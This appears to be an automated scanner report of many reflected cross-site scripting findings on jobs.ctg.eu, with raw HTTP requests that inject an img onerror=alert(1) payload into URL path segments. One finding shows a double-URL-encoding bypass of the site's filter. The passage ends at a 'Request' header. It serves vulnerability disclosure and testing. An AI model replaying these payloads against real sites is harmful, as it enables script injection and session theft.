GET /modulesf56d7"><img%20src%3da%20onerror%3dalert(1)>18564c695ef/user/user.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 384dd"><img%20src%3da%20onerror%3dalert(1)>cb03368af2d was submitted in the REST URL parameter 2. This input was echoed as 384dd"><img src=a onerror=alert(1)>cb03368af2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/user384dd"><img%20src%3da%20onerror%3dalert(1)>cb03368af2d/user.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcae4"><img%20src%3da%20onerror%3dalert(1)>8e144cc5a4f was submitted in the REST URL parameter 3. This input was echoed as bcae4"><img src=a onerror=alert(1)>8e144cc5a4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /modules/user/user.cssbcae4"><img%20src%3da%20onerror%3dalert(1)>8e144cc5a4f?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1d6e"><img%20src%3da%20onerror%3dalert(1)>39ce1ac88d4 was submitted in the REST URL parameter 1. This input was echoed as b1d6e"><img src=a onerror=alert(1)>39ce1ac88d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesb1d6e"><img%20src%3da%20onerror%3dalert(1)>39ce1ac88d4/all/modules/antispam/antispam.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983d6"><img%20src%3da%20onerror%3dalert(1)>da38364a609 was submitted in the REST URL parameter 2. This input was echoed as 983d6"><img src=a onerror=alert(1)>da38364a609 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all983d6"><img%20src%3da%20onerror%3dalert(1)>da38364a609/modules/antispam/antispam.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5fb9"><img%20src%3da%20onerror%3dalert(1)>1733aaca289 was submitted in the REST URL parameter 3. This input was echoed as a5fb9"><img src=a onerror=alert(1)>1733aaca289 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesa5fb9"><img%20src%3da%20onerror%3dalert(1)>1733aaca289/antispam/antispam.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b934a"><img%20src%3da%20onerror%3dalert(1)>9153850d8df was submitted in the REST URL parameter 4. This input was echoed as b934a"><img src=a onerror=alert(1)>9153850d8df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/antispamb934a"><img%20src%3da%20onerror%3dalert(1)>9153850d8df/antispam.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70579"><img%20src%3da%20onerror%3dalert(1)>61f4e445c3a was submitted in the REST URL parameter 5. This input was echoed as 70579"><img src=a onerror=alert(1)>61f4e445c3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/antispam/antispam.js70579"><img%20src%3da%20onerror%3dalert(1)>61f4e445c3a?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4af12%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eaec5804153d was submitted in the REST URL parameter 5. This input was echoed as 4af12"><img src=a onerror=alert(1)>aec5804153d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e463"><img%20src%3da%20onerror%3dalert(1)>cdfba77e90c was submitted in the REST URL parameter 1. This input was echoed as 7e463"><img src=a onerror=alert(1)>cdfba77e90c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites7e463"><img%20src%3da%20onerror%3dalert(1)>cdfba77e90c/all/modules/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae427"><img%20src%3da%20onerror%3dalert(1)>69860021042 was submitted in the REST URL parameter 2. This input was echoed as ae427"><img src=a onerror=alert(1)>69860021042 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allae427"><img%20src%3da%20onerror%3dalert(1)>69860021042/modules/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0fad"><img%20src%3da%20onerror%3dalert(1)>1d2bbd370ba was submitted in the REST URL parameter 3. This input was echoed as a0fad"><img src=a onerror=alert(1)>1d2bbd370ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesa0fad"><img%20src%3da%20onerror%3dalert(1)>1d2bbd370ba/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce390"><img%20src%3da%20onerror%3dalert(1)>3c08ceec826 was submitted in the REST URL parameter 4. This input was echoed as ce390"><img src=a onerror=alert(1)>3c08ceec826 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cckce390"><img%20src%3da%20onerror%3dalert(1)>3c08ceec826/modules/fieldgroup/fieldgroup.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e65d8"><img%20src%3da%20onerror%3dalert(1)>e9929ea8807 was submitted in the REST URL parameter 5. This input was echoed as e65d8"><img src=a onerror=alert(1)>e9929ea8807 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cck/modulese65d8"><img%20src%3da%20onerror%3dalert(1)>e9929ea8807/fieldgroup/fieldgroup.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e73f"><img%20src%3da%20onerror%3dalert(1)>19a202725ce was submitted in the REST URL parameter 6. This input was echoed as 6e73f"><img src=a onerror=alert(1)>19a202725ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cck/modules/fieldgroup6e73f"><img%20src%3da%20onerror%3dalert(1)>19a202725ce/fieldgroup.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff42a"><img%20src%3da%20onerror%3dalert(1)>4df1db9c331 was submitted in the REST URL parameter 7. This input was echoed as ff42a"><img src=a onerror=alert(1)>4df1db9c331 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cck/modules/fieldgroup/fieldgroup.cssff42a"><img%20src%3da%20onerror%3dalert(1)>4df1db9c331?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa69"><img%20src%3da%20onerror%3dalert(1)>d04d20f30bd was submitted in the REST URL parameter 1. This input was echoed as bfa69"><img src=a onerror=alert(1)>d04d20f30bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesbfa69"><img%20src%3da%20onerror%3dalert(1)>d04d20f30bd/all/modules/cck/theme/content-module.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbafa"><img%20src%3da%20onerror%3dalert(1)>d4cc4ccb574 was submitted in the REST URL parameter 2. This input was echoed as cbafa"><img src=a onerror=alert(1)>d4cc4ccb574 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allcbafa"><img%20src%3da%20onerror%3dalert(1)>d4cc4ccb574/modules/cck/theme/content-module.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a826d"><img%20src%3da%20onerror%3dalert(1)>07168fe7c99 was submitted in the REST URL parameter 3. This input was echoed as a826d"><img src=a onerror=alert(1)>07168fe7c99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesa826d"><img%20src%3da%20onerror%3dalert(1)>07168fe7c99/cck/theme/content-module.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0c8"><img%20src%3da%20onerror%3dalert(1)>cb88e4e60ce was submitted in the REST URL parameter 4. This input was echoed as bf0c8"><img src=a onerror=alert(1)>cb88e4e60ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cckbf0c8"><img%20src%3da%20onerror%3dalert(1)>cb88e4e60ce/theme/content-module.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fc41"><img%20src%3da%20onerror%3dalert(1)>4a59448569d was submitted in the REST URL parameter 5. This input was echoed as 5fc41"><img src=a onerror=alert(1)>4a59448569d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cck/theme5fc41"><img%20src%3da%20onerror%3dalert(1)>4a59448569d/content-module.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c74"><img%20src%3da%20onerror%3dalert(1)>ed85725023d was submitted in the REST URL parameter 6. This input was echoed as 64c74"><img src=a onerror=alert(1)>ed85725023d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/cck/theme/content-module.css64c74"><img%20src%3da%20onerror%3dalert(1)>ed85725023d?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfd76"><img%20src%3da%20onerror%3dalert(1)>99b0fe2a1d7 was submitted in the REST URL parameter 1. This input was echoed as dfd76"><img src=a onerror=alert(1)>99b0fe2a1d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesdfd76"><img%20src%3da%20onerror%3dalert(1)>99b0fe2a1d7/all/modules/filefield/filefield.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a0d6"><img%20src%3da%20onerror%3dalert(1)>14b10f530b0 was submitted in the REST URL parameter 2. This input was echoed as 2a0d6"><img src=a onerror=alert(1)>14b10f530b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all2a0d6"><img%20src%3da%20onerror%3dalert(1)>14b10f530b0/modules/filefield/filefield.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa6eb"><img%20src%3da%20onerror%3dalert(1)>14bd3227d0a was submitted in the REST URL parameter 3. This input was echoed as fa6eb"><img src=a onerror=alert(1)>14bd3227d0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modulesfa6eb"><img%20src%3da%20onerror%3dalert(1)>14bd3227d0a/filefield/filefield.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c98c"><img%20src%3da%20onerror%3dalert(1)>069115183be was submitted in the REST URL parameter 4. This input was echoed as 3c98c"><img src=a onerror=alert(1)>069115183be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/filefield3c98c"><img%20src%3da%20onerror%3dalert(1)>069115183be/filefield.css?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fd8"><img%20src%3da%20onerror%3dalert(1)>1fcab1747c6 was submitted in the REST URL parameter 5. This input was echoed as c1fd8"><img src=a onerror=alert(1)>1fcab1747c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/filefield/filefield.cssc1fd8"><img%20src%3da%20onerror%3dalert(1)>1fcab1747c6?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73224"><img%20src%3da%20onerror%3dalert(1)>9589d103583 was submitted in the REST URL parameter 1. This input was echoed as 73224"><img src=a onerror=alert(1)>9589d103583 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
